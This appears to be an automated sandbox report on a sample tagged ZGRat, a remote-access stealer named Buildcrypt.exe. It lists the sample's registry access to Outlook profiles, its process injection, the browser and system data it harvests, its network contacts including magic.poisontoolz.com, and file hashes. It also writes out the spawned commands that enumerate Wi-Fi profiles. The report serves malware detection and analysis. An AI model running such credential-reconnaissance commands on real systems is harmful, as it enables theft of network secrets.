US 8.8.8.8:53 58.189.79.40.in-addr.arpa udp
GB 96.16.110.114:80 tcp
US 8.8.8.8:53 udp
NL 52.142.223.178:80 tcp

Files

N/A

Analysis: behavioral3

Detonation Overview

Submitted

2024-01-19 20:19

Reported

2024-01-19 20:23

Platform

win10v2004-20231215-en

Max time kernel

128s

Max time network

130s

Command Line

"C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Buildcrypt.exe"

Signatures

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

ZGRat

rat zgrat

Reads user/profile data of web browsers

spyware stealer

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1815711207-1844170477-3539718864-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Buildcrypt.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1815711207-1844170477-3539718864-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Buildcrypt.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1815711207-1844170477-3539718864-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Buildcrypt.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 640 set thread context of 4480 N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Buildcrypt.exe C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Buildcrypt.exe

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Buildcrypt.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Buildcrypt.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Buildcrypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Buildcrypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Buildcrypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Buildcrypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Buildcrypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Buildcrypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Buildcrypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Buildcrypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Buildcrypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Buildcrypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Buildcrypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Buildcrypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Buildcrypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Buildcrypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Buildcrypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Buildcrypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Buildcrypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Buildcrypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Buildcrypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Buildcrypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Buildcrypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Buildcrypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Buildcrypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Buildcrypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Buildcrypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Buildcrypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Buildcrypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Buildcrypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Buildcrypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Buildcrypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Buildcrypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Buildcrypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Buildcrypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Buildcrypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Buildcrypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Buildcrypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Buildcrypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Buildcrypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Buildcrypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Buildcrypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Buildcrypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Buildcrypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Buildcrypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Buildcrypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Buildcrypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Buildcrypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Buildcrypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Buildcrypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Buildcrypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Buildcrypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Buildcrypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Buildcrypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Buildcrypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Buildcrypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Buildcrypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Buildcrypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Buildcrypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Buildcrypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Buildcrypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Buildcrypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Buildcrypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Buildcrypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Buildcrypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Buildcrypt.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Buildcrypt.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Buildcrypt.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Buildcrypt.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 640 wrote to memory of 4480 N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Buildcrypt.exe C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Buildcrypt.exe
PID 640 wrote to memory of 4480 N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Buildcrypt.exe C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Buildcrypt.exe
PID 640 wrote to memory of 4480 N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Buildcrypt.exe C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Buildcrypt.exe
PID 640 wrote to memory of 4480 N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Buildcrypt.exe C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Buildcrypt.exe
PID 640 wrote to memory of 4480 N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Buildcrypt.exe C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Buildcrypt.exe
PID 640 wrote to memory of 4480 N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Buildcrypt.exe C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Buildcrypt.exe
PID 640 wrote to memory of 4480 N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Buildcrypt.exe C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Buildcrypt.exe
PID 640 wrote to memory of 4480 N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Buildcrypt.exe C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Buildcrypt.exe
PID 4480 wrote to memory of 2240 N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Buildcrypt.exe C:\Windows\SysWOW64\cmd.exe
PID 4480 wrote to memory of 2240 N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Buildcrypt.exe C:\Windows\SysWOW64\cmd.exe
PID 4480 wrote to memory of 2240 N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Buildcrypt.exe C:\Windows\SysWOW64\cmd.exe
PID 2240 wrote to memory of 3248 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 2240 wrote to memory of 3248 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 2240 wrote to memory of 3248 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 2240 wrote to memory of 4360 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\netsh.exe
PID 2240 wrote to memory of 4360 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\netsh.exe
PID 2240 wrote to memory of 4360 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\netsh.exe
PID 2240 wrote to memory of 4632 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 2240 wrote to memory of 4632 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 2240 wrote to memory of 4632 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 4480 wrote to memory of 2268 N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Buildcrypt.exe C:\Windows\SysWOW64\cmd.exe
PID 4480 wrote to memory of 2268 N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Buildcrypt.exe C:\Windows\SysWOW64\cmd.exe
PID 4480 wrote to memory of 2268 N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Buildcrypt.exe C:\Windows\SysWOW64\cmd.exe
PID 2268 wrote to memory of 3088 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 2268 wrote to memory of 3088 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 2268 wrote to memory of 3088 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 2268 wrote to memory of 4240 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\netsh.exe
PID 2268 wrote to memory of 4240 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\netsh.exe
PID 2268 wrote to memory of 4240 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\netsh.exe

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1815711207-1844170477-3539718864-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Buildcrypt.exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1815711207-1844170477-3539718864-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Buildcrypt.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Buildcrypt.exe

"C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Buildcrypt.exe"

C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Buildcrypt.exe

C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Buildcrypt.exe

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All

C:\Windows\SysWOW64\netsh.exe

netsh wlan show profile

C:\Windows\SysWOW64\findstr.exe

findstr All

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Windows\SysWOW64\chcp.com

chcp 65001

C:\Windows\SysWOW64\netsh.exe

netsh wlan show networks mode=bssid

C:\Windows\SysWOW64\chcp.com

chcp 65001

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid

Network

Country Destination Domain Proto
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 41.179.17.96.in-addr.arpa udp
US 8.8.8.8:53 magic.poisontoolz.com udp
US 104.21.10.90:443 magic.poisontoolz.com tcp
US 8.8.8.8:53 90.10.21.104.in-addr.arpa udp
US 8.8.8.8:53 76.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 evcs-ocsp.ws.symantec.com udp
US 152.199.19.74:80 evcs-ocsp.ws.symantec.com tcp
US 8.8.8.8:53 74.19.199.152.in-addr.arpa udp
US 8.8.8.8:53 79.179.17.96.in-addr.arpa udp
US 20.231.121.79:80 tcp
US 8.8.8.8:53 48.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 79.121.231.20.in-addr.arpa udp
US 8.8.8.8:53 29.179.17.96.in-addr.arpa udp
US 8.8.8.8:53 udp
N/A 162.159.133.233:443 tcp
US 8.8.8.8:53 udp
IN 52.140.118.28:443 tcp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
N/A 104.18.115.97:80 tcp
IN 52.140.118.28:443 tcp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
N/A 20.166.126.56:443 tcp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
N/A 104.77.160.28:80 tcp
US 8.8.8.8:53 udp
N/A 104.18.115.97:80 tcp
US 8.8.8.8:53 udp
N/A 151.80.29.83:443 tcp
US 8.8.8.8:53 udp
N/A 136.175.8.205:443 tcp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
N/A 104.18.115.97:80 tcp
N/A 162.159.133.233:443 tcp
US 8.8.8.8:53 udp
GB 96.16.110.114:80 tcp
US 8.8.8.8:53 udp

Files

memory/640-0-0x0000000074CA0000-0x0000000075450000-memory.dmp

memory/640-1-0x0000000000740000-0x000000000075C000-memory.dmp

memory/640-2-0x0000000005100000-0x0000000005110000-memory.dmp

memory/640-3-0x0000000006C00000-0x0000000006E0A000-memory.dmp

memory/640-4-0x0000000006C00000-0x0000000006E04000-memory.dmp

memory/640-5-0x0000000006C00000-0x0000000006E04000-memory.dmp

memory/640-9-0x0000000006C00000-0x0000000006E04000-memory.dmp

memory/640-7-0x0000000006C00000-0x0000000006E04000-memory.dmp

memory/640-11-0x0000000006C00000-0x0000000006E04000-memory.dmp

memory/640-15-0x0000000006C00000-0x0000000006E04000-memory.dmp

memory/640-19-0x0000000006C00000-0x0000000006E04000-memory.dmp

memory/640-23-0x0000000006C00000-0x0000000006E04000-memory.dmp

memory/640-27-0x0000000006C00000-0x0000000006E04000-memory.dmp

memory/640-31-0x0000000006C00000-0x0000000006E04000-memory.dmp

memory/640-35-0x0000000006C00000-0x0000000006E04000-memory.dmp

memory/640-37-0x0000000006C00000-0x0000000006E04000-memory.dmp

memory/640-39-0x0000000006C00000-0x0000000006E04000-memory.dmp

memory/640-43-0x0000000006C00000-0x0000000006E04000-memory.dmp

memory/640-45-0x0000000006C00000-0x0000000006E04000-memory.dmp

memory/640-47-0x0000000006C00000-0x0000000006E04000-memory.dmp

memory/640-49-0x0000000006C00000-0x0000000006E04000-memory.dmp

memory/640-51-0x0000000006C00000-0x0000000006E04000-memory.dmp

memory/640-53-0x0000000006C00000-0x0000000006E04000-memory.dmp

memory/640-57-0x0000000006C00000-0x0000000006E04000-memory.dmp

memory/640-61-0x0000000006C00000-0x0000000006E04000-memory.dmp

memory/640-63-0x0000000006C00000-0x0000000006E04000-memory.dmp

memory/640-65-0x0000000006C00000-0x0000000006E04000-memory.dmp

memory/640-67-0x0000000006C00000-0x0000000006E04000-memory.dmp

memory/640-59-0x0000000006C00000-0x0000000006E04000-memory.dmp

memory/640-55-0x0000000006C00000-0x0000000006E04000-memory.dmp

memory/640-41-0x0000000006C00000-0x0000000006E04000-memory.dmp

memory/640-33-0x0000000006C00000-0x0000000006E04000-memory.dmp

memory/640-29-0x0000000006C00000-0x0000000006E04000-memory.dmp

memory/640-25-0x0000000006C00000-0x0000000006E04000-memory.dmp

memory/640-21-0x0000000006C00000-0x0000000006E04000-memory.dmp

memory/640-17-0x0000000006C00000-0x0000000006E04000-memory.dmp

memory/640-13-0x0000000006C00000-0x0000000006E04000-memory.dmp

memory/640-936-0x0000000002B70000-0x0000000002B71000-memory.dmp

memory/640-938-0x0000000006F80000-0x0000000006FCC000-memory.dmp

memory/640-937-0x0000000007110000-0x00000000072B2000-memory.dmp

memory/640-939-0x0000000007920000-0x0000000007EC4000-memory.dmp

memory/640-945-0x0000000074CA0000-0x0000000075450000-memory.dmp

memory/4480-944-0x0000000074CA0000-0x0000000075450000-memory.dmp

memory/4480-943-0x0000000000400000-0x0000000000592000-memory.dmp

memory/4480-946-0x0000000005710000-0x0000000005776000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Buildcrypt.exe.log

MD5 c3941d9fa38f1717d5cecd7a2ca71667
SHA1 33b5362675383b58b4166ed9f9a61e5aa6768d2e
SHA256 f1ed6ff1cd3df219061e32df1c75d6f48de6484cf50e5ea7d86cd8bcfcb93256
SHA512 98f103ef97d32bf8c0566a6f6da5cf8d58d18f698c1b3e5bd0be0ea8462f5fe54c2e5e6b5188f2b7d8f70082ffd6745b1f7f6cab95af474e2b7eaed50a9d9c45

memory/4480-947-0x00000000057C0000-0x00000000057D0000-memory.dmp

memory/4480-953-0x0000000006030000-0x0000000006038000-memory.dmp

memory/4480-952-0x0000000006000000-0x0000000006026000-memory.dmp

memory/4480-951-0x0000000005F70000-0x0000000006002000-memory.dmp

memory/4480-955-0x0000000006E60000-0x0000000006E68000-memory.dmp

memory/4480-956-0x0000000006E80000-0x0000000006E9E000-memory.dmp

memory/4480-954-0x0000000006E50000-0x0000000006E5A000-memory.dmp

C:\Users\Admin\AppData\Local\e2bed16f33a1d21c74bd6ea14529f635\Admin@IMXSDNYJ_en-US\Browsers\Firefox\Bookmarks.txt

MD5 2e9d094dda5cdc3ce6519f75943a4ff4
SHA1 5d989b4ac8b699781681fe75ed9ef98191a5096c
SHA256 c84c98bbf5e0ef9c8d0708b5d60c5bb656b7d6be5135d7f7a8d25557e08cf142
SHA512 d1f7eed00959e902bdb2125b91721460d3ff99f3bdfc1f2a343d4f58e8d4e5e5a06c0c6cdc0379211c94510f7c00d7a8b34fa7d0ca0c3d54cbbe878f1e9812b7

memory/4480-1013-0x00000000077B0000-0x0000000007842000-memory.dmp

C:\Users\Admin\AppData\Local\e2bed16f33a1d21c74bd6ea14529f635\Admin@IMXSDNYJ_en-US\System\Process.txt

MD5 1ee536f8825f6e2687ef66d381d8f207
SHA1 226510773d4cce296c65a148113cc8748dcd2eb5
SHA256 17f9cee741ac5c44270e2e06cffe0733c0048eeff575a722552ab3faa60c22e4
SHA512 0e7be43674727276b6a1ca1b1b96cca435f9dc1feefce7a150632f171313b365ee59bc842244c6dfaf53b951bff3f9cad781ea70795cfed163db767f50a55e7f

memory/4480-1113-0x00000000057C0000-0x00000000057D0000-memory.dmp

C:\Users\Admin\AppData\Local\e2bed16f33a1d21c74bd6ea14529f635\Admin@IMXSDNYJ_en-US\System\Apps.txt

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/4480-1148-0x0000000006FE0000-0x000000000705A000-memory.dmp

C:\Users\Admin\AppData\Local\e2bed16f33a1d21c74bd6ea14529f635\Admin@IMXSDNYJ_en-US\System\Apps.txt

MD5 b1d58554f33c991f9454f81bf1f6a7a6
SHA1 1a9c0748fbb4c4974315f6a3188ffb5078372de1
SHA256 2809730601ec3cd803e75dded9788afc2683f6562378a497e7300fd83137838c
SHA512 ef961a73b2b8844155d1684a6d5e0319ad5d0c8cb2c60e4ed16b03cca69e04bf9872f2bff8fdf24d3bf284366f2b2f0d36f1e4c1cd5d007732c3ad0af562d5c6

C:\Users\Admin\AppData\Local\e2bed16f33a1d21c74bd6ea14529f635\Admin@IMXSDNYJ_en-US\System\ProductKey.txt

MD5 71eb5479298c7afc6d126fa04d2a9bde
SHA1 a9b3d5505cf9f84bb6c2be2acece53cb40075113
SHA256 f6cadfd4e4c25ff3b8cffe54a2af24a757a349abbf4e1142ec4c9789347fe8b3
SHA512 7c6687e21d31ec1d6d2eff04b07b465f875fd80df26677f1506b14158444cf55044eb6674880bd5bd44f04ff73023b26cb19b8837427a1d6655c96df52f140bd

C:\Users\Admin\AppData\Local\e2bed16f33a1d21c74bd6ea14529f635\Admin@IMXSDNYJ_en-US\Directories\Videos.txt

MD5 1fddbf1169b6c75898b86e7e24bc7c1f
SHA1 d2091060cb5191ff70eb99c0088c182e80c20f8c
SHA256 a67aa329b7d878de61671e18cd2f4b011d11cbac67ea779818c6dafad2d70733
SHA512 20bfeafde7fec1753fef59de467bd4a3dd7fe627e8c44e95fe62b065a5768c4508e886ec5d898e911a28cf6365f455c9ab1ebe2386d17a76f53037f99061fd4d

C:\Users\Admin\AppData\Local\e2bed16f33a1d21c74bd6ea14529f635\Admin@IMXSDNYJ_en-US\Directories\Startup.txt

MD5 68c93da4981d591704cea7b71cebfb97
SHA1 fd0f8d97463cd33892cc828b4ad04e03fc014fa6
SHA256 889ed51f9c16a4b989bda57957d3e132b1a9c117ee84e208207f2fa208a59483
SHA512 63455c726b55f2d4de87147a75ff04f2daa35278183969ccf185d23707840dd84363bec20d4e8c56252196ce555001ca0e61b3f4887d27577081fdef9e946402

memory/4480-1221-0x00000000072A0000-0x0000000007352000-memory.dmp

memory/4480-1223-0x0000000007100000-0x0000000007122000-memory.dmp

memory/4480-1224-0x00000000088B0000-0x0000000008C04000-memory.dmp

memory/4480-1225-0x0000000074CA0000-0x0000000075450000-memory.dmp

memory/4480-1226-0x00000000057C0000-0x00000000057D0000-memory.dmp

C:\Users\Admin\AppData\Local\e2bed16f33a1d21c74bd6ea14529f635\msgid.dat

MD5 9d694ab3d634fb05b97a4b4e72a69c3d
SHA1 c71f80418ae48b90d4128ab03ac26e4c8c8f8c41
SHA256 b61a8732dc7f3679fa4e0cf02bdbc1d61a813adaafa9df7a0aba53d9127902f9
SHA512 a7eb902af143b7aeae5fb063c303ff90023dce6d16c40e09f1fa7847c453f0e3864f7623daefe9a4d1f71a8c75f27b55ed9bfd0c137e8d607b1fbbd4c5b26327

memory/4480-1238-0x0000000007730000-0x000000000773A000-memory.dmp

memory/4480-1239-0x00000000057C0000-0x00000000057D0000-memory.dmp

Analysis: behavioral15

Detonation Overview

Submitted

2024-01-19 20:19

Reported

2024-01-19 20:23

Platform

win10v2004-20231222-en

Max time kernel

0s

Max time network

148s

Command Line

"C:\Program Files (x86)\Windows Media Player\wmplayer.exe" /Open "C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Spaufgty.wav"

Signatures

Processes

C:\Program Files (x86)\Windows Media Player\wmplayer.exe

"C:\Program Files (x86)\Windows Media Player\wmplayer.exe" /Open "C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Spaufgty.wav"

C:\Program Files (x86)\Windows Media Player\setup_wm.exe

"C:\Program Files (x86)\Windows Media Player\setup_wm.exe" /RunOnce:"C:\Program Files (x86)\Windows Media Player\wmplayer.exe" /Open "C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Spaufgty.wav"

C:\Windows\SysWOW64\unregmp2.exe

"C:\Windows\System32\unregmp2.exe" /AsyncFirstLogon

C:\Windows\system32\unregmp2.exe

"C:\Windows\SysNative\unregmp2.exe" /AsyncFirstLogon /REENTRANT

Network

Country Destination Domain Proto
US 8.8.8.8:53 wmploc.dll udp
US 8.8.8.8:53 17.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 41.179.17.96.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.200:443 g.bing.com tcp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 9.228.82.20.in-addr.arpa udp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 23.160.77.104.in-addr.arpa udp
US 20.231.121.79:80 tcp
US 8.8.8.8:53 31.179.17.96.in-addr.arpa udp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp

Files

